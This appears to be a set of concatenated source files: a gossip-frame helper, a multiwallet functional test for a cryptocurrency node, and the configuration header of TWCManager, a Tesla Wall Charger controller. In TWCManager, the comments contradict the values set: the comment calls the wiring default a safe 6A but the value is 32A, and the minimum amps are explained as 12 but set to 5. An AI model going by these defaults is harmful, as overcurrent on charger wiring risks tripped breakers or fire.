# gossip = control_b + feed_len_b
#
# #a = str(gossip[0], 'big')
# #b = str(gossip[1:2], 'big')
# feed_len_int = feed_len_b[0] * 256 + feed_len_b[1]
# control_int = control_b[0] * 1
#print("Sync Layer | Feed lenght: " + str(len(self.feed)))
#msg = "gssp-bc//" + str(feed_len)
#print(msg)
self.link_layer.append_msg_to_pipeline(gossip, False)
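# Frame-format sketch (illustrative only, mirrors decode_msg() and send_gossip()
# above): a gossip frame is 1 control byte (0), 8 bytes of feed id and a 2-byte
# big-endian feed length; an event frame uses control byte 1 and appends the
# wired event bytes.
def _example_build_frames(fid, feed_len, event_bytes=b''):
    gossip = (0).to_bytes(1, 'big') + fid + feed_len.to_bytes(2, 'big')
    event = (1).to_bytes(1, 'big') + fid + feed_len.to_bytes(2, 'big') + event_bytes
    return gossip, event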
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2021 The Danxome Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a danxomed node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import DanxomeTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(DanxomeTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
        in_wallet_dir.append('w7')  # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink points to it
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_director", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
self.generatetoaddress(node, nblocks=1, address=w5.getnewaddress(), sync_fun=self.no_op)
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = f"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
self.generatetoaddress(node, nblocks=1, address=wallets[0].getnewaddress(), sync_fun=self.no_op)
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
self.generatetoaddress(node, nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress(), sync_fun=self.no_op)
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
self.generatetoaddress(node, nblocks=1, address=w1.getnewaddress(), sync_fun=self.no_op)
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, f"Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2")
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
TWCManager.py
|
#! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/cdragon/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# WARNING:
# Misuse of the protocol described in this software can direct a Tesla Wall
# Charger to supply more current to a car than the charger wiring was designed
# for. This will trip a circuit breaker or may start a fire in the unlikely
# event that the circuit breaker fails.
# This software was not written or designed with the benefit of information from
# Tesla and there is always a small possibility that some unforeseen aspect of
# its operation could damage a Tesla vehicle or a Tesla Wall Charger. All
# efforts have been made to avoid such damage and this software is in active use
# on the author's own vehicle and TWC.
#
# In short, USE THIS SOFTWARE AT YOUR OWN RISK.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
################################################################################
# What's TWCManager good for?
#
# This script (TWCManager) pretends to be a Tesla Wall Charger (TWC) set to
# master mode. When wired to the IN or OUT pins of real TWC units set to slave
# mode (rotary switch position F), TWCManager can tell them to limit car
# charging to any whole amp value between 5A and the max rating of the charger.
# Charging can also be stopped so the car goes to sleep.
#
# This level of control is useful for having TWCManager track the real-time
# availability of green energy sources and direct the slave TWCs to use near the
# exact amount of energy available. This saves energy compared to sending the
# green energy off to a battery for later car charging or off to the grid where
# some of it is lost in transmission.
#
# TWCManager can also be set up to only allow charging during certain hours,
# stop charging if a grid overload or "save power day" is detected, reduce
# charging on one TWC when a "more important" one is plugged in, or whatever
# else you might want to do.
#
# One thing TWCManager does not have direct access to is the battery charge
# percentage of each plugged-in car. There are hints on forums that some TWCs
# do report battery state, but we have yet to see a TWC send such a message.
# It's possible the feature exists in TWCs with newer firmware.
# This is unfortunate, but if you own a Tesla vehicle being charged, people have
# figured out how to get its charge state by contacting Tesla's servers using
# the same password you use in the Tesla phone app. Be very careful not to
# expose that password because it allows unlocking and starting the car.
################################################################################
# Overview of protocol TWCs use to load share
#
# A TWC set to slave mode (rotary switch position F) sends a linkready message
# every 10 seconds.
# The message contains a unique 4-byte id that identifies that particular slave
# as the sender of the message.
#
# A TWC set to master mode sees a linkready message. In response, it sends a
# heartbeat message containing the slave's 4-byte id as the intended recipient
# of the message.
# The master's 4-byte id is included as the sender of the message.
#
# Slave sees a heartbeat message from master directed to its unique 4-byte id
# and responds with its own heartbeat message containing the master's 4-byte id
# as the intended recipient of the message.
# The slave's 4-byte id is included as the sender of the message.
#
# Master sends a heartbeat to a slave around once per second and expects a
# response heartbeat from the slave.
# Slaves do not send heartbeats without seeing one from a master first. If
# heartbeats stop coming from master, slave resumes sending linkready every 10
# seconds.
# If slaves stop replying to heartbeats from master, master stops sending
# heartbeats after about 26 seconds.
#
# Heartbeat messages contain a data block used to negotiate the amount of power
# available to each slave and to the master.
# The first byte is a status indicating things like is TWC plugged in, does it
# want power, is there an error, etc.
# Next two bytes indicate the amount of power requested or the amount allowed in
# 0.01 amp increments.
# Next two bytes indicate the amount of power being used to charge the car, also in
# 0.01 amp increments.
# Remaining bytes always contain a value of 0.
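# Worked example (illustrative only; field layout taken from the comments above,
# the byte values are made up). It uses only builtins, so it can sit ahead of the
# imports below: decode the data block of a heartbeat message.
def _example_decode_heartbeat_data(data=bytearray(b'\x01\x0b\xb8\x09\x60\x00\x00')):
    status = data[0]                                  # e.g. 0x01
    amps_requested_or_allowed = ((data[1] << 8) + data[2]) / 100   # 0x0BB8 -> 30.00A
    amps_in_use = ((data[3] << 8) + data[4]) / 100                 # 0x0960 -> 24.00A
    return status, amps_requested_or_allowed, amps_in_use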
import serial
import time
import re
import subprocess
import queue
import random
import math
import struct
import sys
import traceback
import sysv_ipc
import json
from datetime import datetime
import threading
import requests as req
from pymodbus.constants import Endian
from pymodbus.payload import BinaryPayloadDecoder
from pymodbus.client.sync import ModbusTcpClient as ModbusClient
##########################
#
# Configuration parameters
#
# Most users will have only one ttyUSB adapter plugged in and the default value
# of '/dev/ttyUSB0' below will work. If not, run 'dmesg |grep ttyUSB' on the
# command line to find your rs485 adapter and put its ttyUSB# value in the
# parameter below.
# If you're using a non-USB adapter like an RS485 shield, the value may need to
# be something like '/dev/serial0'.
rs485Adapter = '/dev/ttyUSB0'
# Set wiringMaxAmpsAllTWCs to the maximum number of amps your charger wiring
# can handle. I default this to a low 6A which should be safe with the minimum
# standard of wiring in the areas of the world that I'm aware of.
# Most U.S. chargers will be wired to handle at least 40A and sometimes 80A,
# whereas EU chargers will handle at most 32A (using 3 AC lines instead of 2 so
# the total power they deliver is similar).
# Setting wiringMaxAmpsAllTWCs too high will trip the circuit breaker on your
# charger at best or START A FIRE if the circuit breaker malfunctions.
# Keep in mind that circuit breakers are designed to handle only 80% of their
# max power rating continuously, so if your charger has a 50A circuit breaker,
# put 50 * 0.8 = 40 here.
# 40 amp breaker * 0.8 = 32 here.
# 30 amp breaker * 0.8 = 24 here.
# 100 amp breaker * 0.8 = 80 here.
# IF YOU'RE NOT SURE WHAT TO PUT HERE, ASK THE ELECTRICIAN WHO INSTALLED YOUR
# CHARGER.
wiringMaxAmpsAllTWCs = 32
# If all your chargers share a single circuit breaker, set wiringMaxAmpsPerTWC
# to the same value as wiringMaxAmpsAllTWCs.
# Rarely, each TWC will be wired to its own circuit breaker. If you're
# absolutely sure your chargers each have a separate breaker, put the value of
# that breaker * 0.8 here, and put the sum of all breakers * 0.8 as the value of
# wiringMaxAmpsAllTWCs.
# For example, if you have two TWCs each with a 50A breaker, set
# wiringMaxAmpsPerTWC = 50 * 0.8 = 40 and wiringMaxAmpsAllTWCs = 40 + 40 = 80.
wiringMaxAmpsPerTWC = 32
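# Worked example (hypothetical breaker sizes, illustration only): with two TWCs on
# separate 50A breakers, each breaker may carry 80% of its rating continuously, so
# wiringMaxAmpsPerTWC = 50 * 0.8 = 40 and wiringMaxAmpsAllTWCs = 40 + 40 = 80.
def _example_breaker_derating(breaker_amps_per_twc=(50, 50)):
    per_twc = [int(b * 0.8) for b in breaker_amps_per_twc]
    return per_twc, sum(per_twc)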
# https://teslamotorsclub.com/tmc/threads/model-s-gen2-charger-efficiency-testing.78740/#post-1844789
# says you're using 10.85% more power (91.75/82.77=1.1085) charging at 5A vs 40A,
# 2.48% more power at 10A vs 40A, and 1.9% more power at 20A vs 40A. This is
# using a car with 2nd generation onboard AC/DC converter (VINs ending in 20000
# and higher).
# https://teslamotorsclub.com/tmc/threads/higher-amp-charging-is-more-efficient.24972/
# says that cars using a 1st generation charger may use up to 30% more power
# at 6A vs 40A! However, the data refers to 120V 12A charging vs 240V 40A
# charging. 120V 12A is technically the same power as 240V 6A, but the car
# batteries need 400V DC to charge and a lot more power is wasted converting
# 120V AC to 400V DC than 240V AC to 400V DC.
#
# The main point is 6A charging wastes a lot of power, so we default to charging
# at a minimum of 12A by setting minAmpsPerTWC to 12. I picked 12A instead of 10A
# because there is a theory that multiples of 3A are most efficient, though I
# couldn't find any data showing that had been tested.
#
# Most EU chargers are connected to 230V, single-phase power which means 12A is
# about the same power as in US chargers. If you have three-phase power, you can
# lower minAmpsPerTWC to 6 and still be charging with more power than 12A on
# single-phase. For example, 12A * 230V * 1 = 2760W for single-phase power, while
# 6A * 230V * 3 = 4140W for three-phase power. Consult an electrician if this
# doesn't make sense.
#
# https://forums.tesla.com/forum/forums/charging-lowest-amperage-purposely
# says another reason to charge at higher power is to preserve battery life.
# The best charge rate is the capacity of the battery pack / 2. Home chargers
# can't reach that rate, so charging as fast as your wiring supports is best
# from that standpoint. It's not clear how much damage charging at slower
# rates really does.
minAmpsPerTWC = 5
# When you have more than one vehicle associated with the Tesla car API and
# onlyChargeMultiCarsAtHome = True, cars will only be controlled by the API when
# parked at home. For example, when one vehicle is plugged in at home and
# another is plugged in at a remote location and you've set TWCManager to stop
# charging at the current time, only the one plugged in at home will be stopped
# from charging using the car API.
# Unfortunately, bugs in the car GPS system may cause a car to not be reported
# as at home even if it is, in which case the car might not be charged when you
# expect it to be. If you encounter that problem with multiple vehicles, you can
# set onlyChargeMultiCarsAtHome = False, but you may encounter the problem of
# a car not at home being stopped from charging by the API.
onlyChargeMultiCarsAtHome = True
# After determining how much green energy is available for charging, we add
# greenEnergyAmpsOffset to the value. This is most often given a negative value
# equal to the average amount of power consumed by everything other than car
# charging. For example, if your house uses an average of 2.8A to power
# computers, lights, etc while you expect the car to be charging, set
# greenEnergyAmpsOffset = -2.8.
#
# If you have solar panels, look at your utility meter while your car charges.
# If it says you're using 0.67kW, that means you should set
# greenEnergyAmpsOffset = -0.67kW * 1000 / 240V = -2.79A assuming you're on the
# North American 240V grid. In other words, during car charging, you want your
# utility meter to show a value close to 0kW meaning no energy is being sent to
# or from the grid.
greenEnergyAmpsOffset = -1
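# Worked example (hypothetical meter reading, illustration only): if the utility
# meter shows 0.67kW of household draw while the car charges on a 240V supply,
# the offset would be -0.67 * 1000 / 240, or about -2.79A.
def _example_green_energy_offset(house_load_kw=0.67, grid_volts=240):
    return -house_load_kw * 1000.0 / grid_volts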
# Choose how much debugging info to output.
# 0 is no output other than errors.
# 1 is just the most useful info.
# 2-8 add debugging info
# 9 includes raw RS-485 messages transmitted and received (2-3 per sec)
# 10 is all info.
# 11 is more than all info. ;)
debugLevel = 10
# Choose whether to display milliseconds after time on each line of debug info.
displayMilliseconds = False
# Normally we fake being a TWC Master using fakeMaster = 1.
# Two other settings are available, but are only useful for debugging and
# experimenting:
# Set fakeMaster = 0 to fake being a TWC Slave instead of Master.
# Set fakeMaster = 2 to display received RS-485 messages but not send any
# unless you use the debugging web interface
# (index.php?debugTWC=1) to send messages.
fakeMaster = 1
# TWC's rs485 port runs at 9600 baud which has been verified with an
# oscilloscope. Don't change this unless something changes in future hardware.
baud = 9600
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 65535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b'\x77\x77')
# TWCs send a seemingly-random byte after their 2-byte TWC id in a number of
# messages. I call this byte their "Sign" for lack of a better term. The byte
# never changes unless the TWC is reset or power cycled. We use hard-coded
# values for now because I don't know if there are any rules to what values can
# be chosen. I picked 77 because it's easy to recognize when looking at logs.
# These shouldn't need to be changed.
masterSign = bytearray(b'\x77')
slaveSign = bytearray(b'\x77')
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def time_now():
global displayMilliseconds
